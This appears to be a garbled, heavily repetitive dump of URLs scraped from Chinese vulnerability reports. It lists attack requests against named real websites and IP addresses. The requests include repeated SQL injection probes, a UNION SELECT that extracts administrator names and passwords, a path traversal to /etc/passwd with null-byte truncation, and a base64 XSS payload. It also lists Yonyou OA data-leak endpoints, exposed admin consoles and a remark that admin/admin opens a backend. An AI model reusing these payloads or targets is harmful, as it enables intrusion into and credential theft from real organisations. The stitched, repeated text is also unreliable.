http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0-- http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1& http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version http://kbfsshop.com/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1%20and%20@@version http://**.**.**.**/priceMedicine/news/pricestanard.jsp?channelid=578&channelname=%D6%D0%D2%BD%BC%B0%C3%F1%D7%E5%D2%BD%D5%EF%C1%C6%C0%E0,如图所示: http://**.**.**.**:1723/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:1723/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:1723/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**:1723/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://**.**.**.**:1723/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://**.**.**.**:1723/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:1723/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:1723/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**:1723/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:1723/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**:1723/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://119.90.53.90/phpmyadmin http://**.**.**.**/data/xy%23!123.mdb http://**.**.**.**/new.asp?cataid=3%27 http://www.csairholiday.com/ http://www.csairholiday.com/?m=travel&c=community&a=travels_home https://211.151.33.43 http://lcx.cc/?i=4167 http://211.151.33.43:7070 http://**.**.**.**:8889/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8889/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:8889/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**:8889/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://pushdx.dnion.com/login.do http://www.dnion.com/case.php www.class.cn http://www.class.cn http://**.**.**.**/manage/talent/cnResume.action http://**.**.**.**/manage/talent/cn/infoView.action?talent.id=543095 http://scms.wh.sdu.edu.cn/proj_login.action http://oa.elion.com.cn/ http://**.**.**.**/reimbursement/cmd.jsp jdbc:jtds:sqlserver**.**.**.**:1433/gt_gamc_test;characterEncoding=UTF-8 http://m.qfpay.com/wp-login.php coding:utf-8 http://**.**.**.**:8080/admin-console/ http://**.**.**.** http://**.**.**.**/download/detail-2.html http://**.**.**.**/passport/ http://**.**.**.**/passport/?type=login http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformation http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88 http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88 http://www.zhaoxiaoshuo.com/paihang.php?y=2008 http://www.bilibili.com/api_proxy?app=tag&action=/tags/archive_add)测试确认后端限制60个字符 http://career.ruc.edu.cn/news.asp?date=2015/10/08 http://**.**.**.**/ http://www.class.cn/assign_course/course_preview?course_id=104362 http://**.**.**.**/news_view.php?id=672&cid1=62 http://**.**.**.**/Article_txt.asp?channel=1&classid=0&id=2547 http://**.**.**.**/admin/login.asp http://**.**.**.**/bugs/wooyun-2015-0143446 http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/misweb/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/misweb/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**:8080/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/mail.do?flag=getQTview&mail_ID=-7601ea42:148eb64960b:-7f6a http://**.**.**.**/vod_view.php?id=251 http://**.**.**.**/houtai/ http://**.**.**.**/admin/ http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**/auth/login http://**.**.**.**/ http://chatmanage.gome.com.cn/ http://chatmanage.gome.com.cn/manage/img/20151014212808.jspx pass:023 http://mail.58ganji.com/ http://**.**.**.**/ReadNews.asp?NewsID=1042&AreaID=8&BigClassID=17&SpecialID=0 http://**.**.**.**/newslist.php?id=41 http://**.**.**.**/newslist.php?id=41 http://**.**.**.** https://beian.zzidc.com/main/checkMessageYzm https://beian.zzidc.com/main/goMobileResetPwd http://mysql.chinaiiss.com/setup/index.php http://mysql.chinaiiss.com//setup/index.php?page=config http://**.**.**.**/bugs/wooyun-2010-0137067 http://m.chinaz.com/ajax.php?action=ajaxdata&alias=index&jsoncallback=1&page=1 http://crm.tv.tcl.com/DRP/ http://**.**.**.**,利用代码如下 http://**.**.**.**/m1/login.do http://zb.glsc.com.cn/manager/ zb.glsc.com.cn/dlarea/dl_model.php?bid=122&bname=%E8%AF%BA%E5%9F%BA%E4%BA%9A&mname=6234&from=b&mid=1268 zb.glsc.com.cn/dlarea/dl_model.php?bid=122&bname=%E8%AF%BA%E5%9F%BA%E4%BA%9A&mname=6234&from=b&mid=1268* http://bqfood.ynet.com/cgi/news.php?id=529503 http://222.189.156.67:8089/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://222.189.156.67:8089/yyoa/checkWaitdo.jsp?userID=1 http://222.189.156.67:8089/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://222.189.156.67:8089/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://222.189.156.67:8089/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://222.189.156.67:8089/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgiSSdtIFhTUyIpPC9zY3JpcHQ+ http://gwtest.wanda.cn http://**.**.**.**/ http://sunny.dongfeng-nissan.com.cn http://nbadata.m.sohu.com/nba/data_rank.php?type=steals&types=p http://113.16.174.145:8808/system/login!login.action http://**.**.**.**/sbm_admin/login.aspx http://**.**.**.**/wooyun.txt http://**.**.**.**/index.php?m=content&c=search&catid=7&theme=3399&area=0&crowd=0&level=0&ticselect=0 http://**.**.**.**/news/showarticle.asp?id=148 http://**.**.**.**/LoginCheck.aspx http://**.**.**.**:888/LoginCheck.aspx http://**.**.**.**/sfoa-v5/LoginCheck.aspx http://**.**.**.**/Album/Pview.asp?AlbumOwer=qqqaj4&Albumid=21&Pic=1 http://wooyun.org/bugs/wooyun-2015-0137888 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/cms/zhmm.aspx http://**.**.**.**/cms/web_bgcx.aspx http://**.**.**.**/cms/Web_Wsyy.aspx http://**.**.**.**/cms/YHDL.aspx http://**.**.**.**/cms/YHZC.aspx http://58.60.191.91:88/ http://58.60.191.91:88/Admin/Upload.asp http://**.**.**.**:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8080/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**:8080/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://**.**.**.**:8080/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://**.**.**.**:8080/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://**.**.**.**:8080/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://lvyue.lvmama.com/ http://lvyue.lvmama.com:80/ http://m.haodai.com/daikuan/xindailist http://www.oa8000.com/cms/ https://www.exploit-db.com/exploits/37423/这个漏洞,百度后得到一个宽字节注入 http://www.oa8000.com/cms/uploads/soft/aaa/xx.php http://srm.eebbk.com:85/ http://srv.okii.com:8015/Login.aspx lvyou.baidu.com/notes/photo/getpicbyurlsformat=ajax&t=1444879192002 http://lvyou.baidu.com/notes/photo/getpicbyurls?format=ajax&t=1444879192002 http://m.class.cn/user/register_ajax http://**.**.**.**/bugs/wooyun-2010-0136712。还以为是重复了。仔细看看原来不是重复的。同样的是Lang存在遍历,%00截断 http://**.**.**.**//sys/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:10000/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8082/portal-dev/manufacturerApp/manufacturerAppRigsterAction!loadManufacturerAppIndex.action存在命令执行漏洞 http://**.**.**.**/index.php?m=permanent.news_content&cid=3&ccid=12&id=258 http://**.**.**.**/bugs/wooyun-2014-061802 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://**.**.**.**/ry_list.asp?ry_type=%BD%CC%CA%A6&ry_whoisid=5 http://oa.yogi.com.cn/yyoa/assess/js/initDataAssess.jsp http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.yogi.com.cn/yyoa/common/SelectPerson/reloadData.jsp http://oa.yogi.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://zhelp.shikee.com/home/search?keyword=a http://**.**.**.**/coremail/ http://**.**.**.**/ http://**.**.**.**/vip_1.php http://test.yintong.com.cn/apidemo/API_DEMO/testSign.action http://test.yintong.com.cn/apidemo/API_DEMO/xx.jsp http://**.**.**.**/en/events.php?enddate=2015-10-14& http://**.**.**.**/en/events.php?enddate=2015-10-14& http://**.**.**.**/,底下有个后台地址,点进去,账号密码一致,都是admin,进后台如逛后花园: http://www.eoffice.ecnu.edu.cn/new_gonggao/model/mode_1.asp?ID=4025%20union%20select%201,admin_name,3,4,admin_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20administrator http://mail.huatechsec.com/webmail http://mail.huatechsec.com/webmail/sys.php https://github.com/LastLin/stone/blob/134072bfb9c0277894450de0ebca7bc1c1ede949/stone/webapp_admin/src/main/java/com/autohome/framework/base/mail/ManageConfig.java http://**.**.**.**/list?SPage=1&nt_id=9&KEYWORD=1 http://www.laoyuegou.com/media/video/renqi/top/dota2/type/hero?hero_name=1 http://www.laoyuegou.com/media/video/renqi/top/dota2/type/hero?hero_name=1 http://**.**.**.**/fzbzgzj/login.aspx http://www.ciscostation.com.cn:80/storiesview.j https://auth.dxy.cn/accounts/forget http://kuaiwen.iiyi.com/center/ http://ztc.120.net/admin/kuaiwen/doctor/ls_modify?uid=&status=wait http://ztc.120.net/admin/kuaiwen/doctor/ls_modify?uid=&status=wait http://sso.jrj.com.cn/sso/mobile/retrieveByEmail.jsp www.open.com.cn http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 